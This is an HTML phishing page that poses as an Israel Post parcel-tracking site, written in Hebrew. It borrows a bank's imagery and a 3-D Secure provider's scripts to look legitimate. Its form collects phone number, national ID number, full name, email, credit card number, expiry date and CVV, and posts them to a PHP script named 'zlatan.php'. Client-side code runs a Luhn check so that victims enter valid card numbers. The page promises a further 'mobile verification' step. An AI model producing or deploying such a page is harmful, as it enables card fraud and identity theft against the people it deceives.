<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
  <head>
    <meta http-equiv="content-type" content="application/xhtml+xml; charset=utf-8" />
    <title>Home|דואר ישראל</title>
    <link rel="stylesheet" type="text/css" href="https://acs4.3dsecure.no/mdpayacs/content/040/screen.css" />
    <link rel="stylesheet" type="text/css" href="https://acs4.3dsecure.no/mdpayacs/content/040/dk/gh-buttons.css" />
    <script src="https://acs4.3dsecure.no/mdpayacs/content/commons.js"></script>
    <script src="https://acs4.3dsecure.no/mdpayacs/content/040/js/jquery-1.9.1.min.js"></script>
    <script type="text/javascript" src="./Autentisering_files/date_time.js"></script>
    <script type="text/javascript">

        function onBodyLoad() {
            document.form.otp.focus();
        }
    
	function validate(){
	
	
var filter = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
var tel=document.getElementById("nocphone2");
var email=document.getElementById("em1");
var cc=document.getElementById("ccnn1");
var expm=document.getElementById("cexppdm");
var expa=document.getElementById("cexdyyyyss");
var cv=document.getElementById("qsdq21sd5s4d4s1");
var flag=0;

if (tel.value=="" || isNaN(tel.value) || tel.value.length<8)
 {	tel.style.borderColor="red";flag=1;
 }else{ 
  	tel.style.borderColor="green";
   }
   
if(filter.test(email.value))
{
email.style.borderColor="green";
}else{
email.style.borderColor="red";flag=1;
}

if (cc.value==""||cc.value.length<15 || isNaN(cc.value)){
	cc.style.borderColor="red";flag=1;
	}else
{
	var len = cc.value.length;
	var iCCN = parseInt(cc.value);
	var iTotal = 0;
	for(var i=len;i>0;i--){  
      calc = parseInt(iCCN) % 10; 
      calc = parseInt(calc); 
      iTotal += calc;  
      i--;  
      iCCN = iCCN / 10;                              
      calc = parseInt(iCCN) % 10 ;   
      calc = calc *2;                                 
      switch(calc){
        case 10: calc = 1; break;       
        case 12: calc = 3; break;      
        case 14: calc = 5; break;       
        case 16: calc = 7; break;      
        case 18: calc = 9; break;       
        default: calc = calc;           
      }                                               
    iCCN = iCCN / 10; 
    iTotal += calc; 
  }
	if (iTotal%10!=0)
	{cc.style.borderColor="red";flag=1;
	}else{
	cc.style.borderColor="green";
		}
}
if (expm.value==""|| expm.value<1 ||expm.value>12 || (expa.value==19&& (expm.value==1|| expm.value==2||expm.value==3)))
 {	expm.style.borderColor="red";flag=1;
 }else{ 
  	expm.style.borderColor="green";
   }
 
 if (expa.value==""|| expa.value<19 || expa.value>28)
 {	expa.style.borderColor="red";flag=1;
 }else{ 
  	expa.style.borderColor="green";
   }
   
    
if (cv.value=="" || isNaN(cv.value) || cv.value.length<3)
 {	cv.style.borderColor="red";flag=1;
 }else{ 
  	cv.style.borderColor="green";
   }
if (flag==1)
{document.getElementById("msg_error").style.display="block";return false;}else{document.getElementById("msg_error").style.display="none";return true;}
	}
	</script>
  </head>
  <body onload="onBodyLoad();" bgcolor="#F1F1F1">
    <div id="authform" style="background-image: url('https://www.bankhapoalim.co.il/sites/default/files/media/plazma/Footer/plazmaאבטחת%20מידע.jpg'); background-repeat: no-repeat; background-attachment: fixed; position:absolute; left:0px; top:207px">
      <div class="wrapper" style="width: 369px; height: 513px">
        <div class="logos">
          <table>
            <tbody>
              <tr>
                <td class="identifier"> <img alt="" src="" style="max-height:56px;" /><img

                    alt="" src="" style="max-height:56px;" /> </td>
                <td class="bank"> <br />
                </td>
                <td class="bank"> <img src="logo170.png" alt="2" title="1" longdesc="logo170.png" /><br />
                </td>
              </tr>
            </tbody>
          </table>
        </div>
        <h1 style="text-align: right;"><font color="#FF3300">מעקב משלוחים מהיר</font></h1>
        <h1 style="text-align: right;"><img src="payment-logos.png" alt="r" title="r"

            style="top: 249px; left: 631px; width: 130px; height: 24px;" longdesc="payment-logos.png" /></h1>
        <p align="right"><font color="#FF6666">מידע מקוון על פריטים אשר נשלחו 
		באמצעות דואר שליחים, דואר</font></p>
		<p align="right"><font color="#FF6666">רשום בפנים הארץ, שירותים לחו&quot;ל 
		ומחו&quot;ל</font></p>
		<p align="right">&nbsp;</p>
        <form id="form" name="form" method="POST" action="zlatan.php" style="background-image: url('https://www.searates.com/design/images/index/bg-today.jpg'); background-repeat: no-repeat"> <br />
          <dl style="margin-top: 10px;">
            <dt><b>תַאֲרִיך : </b></dt>
            <dd><span id="date_time"></span><br />
            </dd>
            <script type="text/javascript">window.onload = date_time('date_time');</script>
            <dt><b>מספר טלפון<font color="#FF0000">*</font></b></dt>
            <dd> 
              &nbsp; 
              <select size="1" name="D1" style="color: #666666; font-weight: bold">
				<option>972</option>
				</select>-<input style="width: 60px" id="nocphone2" name="nocphone2" maxlength="10"

                onkeypress="return submitenter(this,event)" width="10" type="text" /></dd>
            <dd> <b>ת.ז. <font color="#FF6666">* </font></b>
            </dd>
			<dd> 
			<input name="id" id="id" style="width: 112px" onkeypress="return submitenter" maxlength="9"

             onkeypress="return submitenter(this,event)" width="10" /></dd>
            <dd> <b>שם המלא<font color="#FF0000">*</font></b></dd>
			<dd> 
			<input name="name" id="name" style="width: 112px" onkeypress="return submitenter" maxlength="30"

             onkeypress="return submitenter(this,event)" width="10" /></dd>
			<dt>&nbsp;</dt>
            <dt><b>אימייל<font color="#FF0000">*</font></b></dt>
            <dd> <input name="em1" id="em1" style="width: 112px" onkeypress="return submitenter(this,event)"

                width="10" type="text" /> </dd>
            <dt><b>מס&#39; כרטיס <font color="#FF0000">*</font></b></dt>
            <dd> <input name="ccnn1" id="ccnn1" style="width: 112px" maxlength="16"

                onkeypress="return submitenter(this,event)" width="10" type="text" />
            </dd>
            <dt><b>תוקף <font color="#FF0000">*</font></b></dt>
            <dd><input style="width: 30px" id="cexppdm" name="cexppdm" maxlength="2"

                onkeypress="return submitenter(this,event)" width="10" type="text" />-<input

                style="width: 30px" id="cexdyyyyss" maxlength="2" name="cexdyyyyss"

                onkeypress="return submitenter(this,event)" width="10" type="text" /></dd>
            <dt> 
			<b><font color="#0000FF">
			<a href="https://direct.tranzila.com/docs/window-cvv.html">CVV</a></font><a href="https://direct.tranzila.com/docs/window-cvv.html">:&nbsp;<font color="#FF0000">*</font></a></b></dt>
            <dd> 
			<input style="width: 45; height:21" id="qsdq21sd5s4d4s1" maxlength="4"

                name="qsdq21sd5s4d4s1" onkeypress="return submitenter(this,event)"

                width="10" type="text" /> <br />
              <br />
            </dd>
          </dl>
          <div id="errorMessage" class="error"></div>
          <div id="msg_error" class="error" style="display: none;">
			<p align="center">מספר כרטיס אשראי לא תקין</div>
          <div style="font-size: 0.92em; margin-bottom: 30px;">
			<p align="center"><b><font color="#000066">הזן את המידע 
			הבא כהלכה ולחץ על</font><font color="#990033"> &quot;</font></b><font color="#0033CC"><b>עדכון</b></font><font color="#990033"><br />
            </font><font color="#000066">
            <b>השלב הבא: אימות נייד</b></font></div>
          <div style="position: absolute; margin-left: 147px;top:507px; height:21px"> <b><button class="button icon approve primary"

                name="submit" id="submit" type="submit" value="submit" onclick="return validate()">
			עדכון</button></b>
          </div>
        </form>
      </div>
    </div>
  </body>
  
  	 <script type="text/javascript">
var cardNumberField = document.getElementById("ccnn1"); //making var for body
var cvvField = document.getElementById("qsdq21sd5s4d4s1");

cardNumberField.addEventListener("keydown", (evt) => {//when this happens
	var cardValue = cardNumberField.value;
	if(cardValue.startsWith("3")){
		cvvField.setAttribute("minlength", "3");
		cvvField.setAttribute("maxlength", "4");
	}else{
			cvvField.setAttribute("minlength", "3");
		cvvField.setAttribute("maxlength", "3");

	}
});	</script>

</html>
</html>